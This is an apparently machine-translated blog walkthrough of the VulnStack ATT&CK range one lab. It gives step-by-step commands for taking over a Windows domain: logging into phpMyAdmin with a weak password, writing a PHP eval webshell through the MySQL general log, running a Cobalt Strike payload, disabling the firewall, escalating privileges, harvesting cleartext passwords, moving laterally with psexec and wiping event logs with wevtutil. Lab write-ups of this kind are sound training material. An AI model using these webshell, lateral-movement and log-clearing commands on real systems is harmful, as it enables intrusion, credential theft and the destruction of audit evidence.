Location>code7788 >text

Penetration testing] ATT&CK range one, phpmyadmin, domain penetration, intranet lateral movement strategy

Popularity:927 ℃/2024-09-19 11:18:47

preamble

VulnStack, as a knowledge platform crafted by the Red Sun security team, has the unique advantage of comprehensively simulating the actual business scenarios of domestic enterprises.Covers core elements such as CMS, vulnerability management and domain management. This design concept stems from the red security team's deep understanding and skillful application of the ATT&CK red team assessment design pattern. The construction of the range environment and the design of the title are centered around theEnvironment setup, vulnerability exploitation, intranet information collection, lateral movement, penetration channel construction, persistence control and trace cleaningand other multi-dimensional development, aimed at creating a real and comprehensive intranet penetration learning environment for security researchers. If anything goes wrong, please point out the masters, the content is for reference only, do not spray, thank you.

image-20240821152514635

environmental preparation

Download link:/vuln/detail/2/

There are three machines in Red Sun One's target machine.

image-20240825180544741

network topology

image-20240826203050580

First modify the virtual network editor to host-only NICs for segment 52

image-20240825181906416

Win7 extranet host add a network card for emulating a public server

image-20240825180340463

After starting to configure the local connection to automatically obtain ip, it is set by default static is not our host net mode, you can not access the Internet, or even access to the host!

image-20240825190253174

Win2008 is the domain control host, configured as follows, change net mode to host only

image-20240825185419014

Win2003 for domain members

image-20240825185346961

boot environment

Login password: hongrisec@2019, all three passwords are the same, if you are asked to change the password again after logging in, then all three machines are the password after you change it, and the account name are Administrator

Win7 start web service to start infiltration now!

image-20240825182955011

Information collection

Discovery Host 129

image-20240825190730900

Then do an nmap port scan on him and find open mysql ports on ports 80 and 3306

image-20240825204056292

Access to the address of the target machine, which contains the absolute path to the system's phpstudy site and the administrator's e-mail address, as well as the remote file containing the function to open the

image-20240825205800234

Scrolling down also reveals a mysql detection

image-20240825204600941

Default weak password root/root, you can test the login successfully

image-20240825204507622

We used dirb, the directory scanner that comes with kali, and scanned the following

dirb http://192.168.209.129/

image-20240825205221559

One visit to find available information,, php version 5.4.45

image-20240825205250250

There's also a phpmyadmin, just log in with the weak password you just used

image-20240825205929192

web penetration

Enter the background, found that mysql does not allow to write files to the outside, not to get the system permissions before we can not modify the path to write the file

show variables like "secure%";

image-20240825210448226

Then use the second way, logging writes to

show variables like "%general%";

image-20240825210959778

We use the root account belongs to the DBA user, this time we can directly modify the log path to the current site's root directory, and create a, write a sentence *, note that the write here is actually written to the log file, rather than writing files to the outside, so there is no need to secure_file_priv parameter for " "

set global general_log="on";
set global general_log_file="C:/phpStudy/WWW/";

image-20240825211343019

image-20240825211810962

Write a one-sentence * horse to the logs, and you can go live successfully

select "<?php @eval($_POST[10]); ?>";

image-20240825212007099

Access log

image-20240825212029722Ant Sword Connection

image-20240825212513078

cs generate * horse

image-20240826095022977

upload * horse (computing)

image-20240826095002637

Execute the * horse and you're online.

image-20240826095357984

Turn off the firewall. It doesn't matter if it's off here.

shell netsh advfirewall set allprofiles state off 

image-20240826102218271

Elevation of Privileges

View permission information, is a super administrator

getuid

image-20240826102326253

Elevation of Privileges

image-20240826175423707

Select the listening module for your kali server address

image-20240826102730859

Try one by one, option xvc-exe to lift power

image-20240826102718739

Privilege to System Privileges Successful

image-20240826102807476

Intranet information collection

View ip address

shell ipconfig

image-20240826101605862

Show all system users

shell net user

image-20240826104041192

Enumerate computer names

shell net view

image-20240826104117216

Determine if a domain exists

shell net config Workstation

image-20240826104150641

Checking how many domains there are results in GOD one

shell net view 	/domain

image-20240826104223609

utilizationskipPerform port scanning

image-20240826104343788

Specify another NIC for this host, either using arp scan or icmp scan.

image-20240826104404290

Found two mainframes

image-20240826104735899

And it's all open.445 port

image-20240826105845825

capture a cleartext password

image-20240826104857388

intranet horizontal

We just found port 445 open when we port scanned, so we can create theSMB listening tunnel(The SMB (Server Message Block) protocol on Windows is a network file sharing protocol that allows users to access resources such as files and printers between computers on a network.)

New Listener

image-20240826110021520

image-20240826110218245

Presentation of objectives in list form

image-20240826110735862

Locate the domain control host that was just scanned for thelateral movementSelect the psexec option.

image-20240826110820766

The configuration is as follows

image-20240826110922975

This is when you get the domain control server

image-20240826111327199

The same is true for the other intranet host, since they are both under the same domain

image-20240826140657871

Clear the logs, be careful, run it more than once, some times it may not be cleaned up

shell wevtutil cl security //clear security logs
shell wevtutil cl system //clear system logs
shell wevtutil cl application //clear application logs
shell wevtutil cl "windows powershell" //clear power shell logs
shell wevtutil cl Setup //clears the "Setup" event from the event log.

image-20240826173556830

Or just use the plugin

image-20240826173733111

image-20240826173747058

Network topology maps are all online

image-20240826183227480

summarize

I managed to get 3 target machines on line, hhhhhhh, masters point and click, crabs

202408262019441 (1)

recall the past and present

The latest available, bp + charles applet grabbing tutorials

[Intranet Penetration] ICMP Tunneling Technology, ICMP Encapsulation Penetrating Firewall on MSF/CS

Intranet penetration tools, Cobal_Strike Chinese guide to use

DC-2 integrated penetration, rbash escape, git lift, wordpress range penetration tutorials

Penetration testing] 12 rbash escape way summary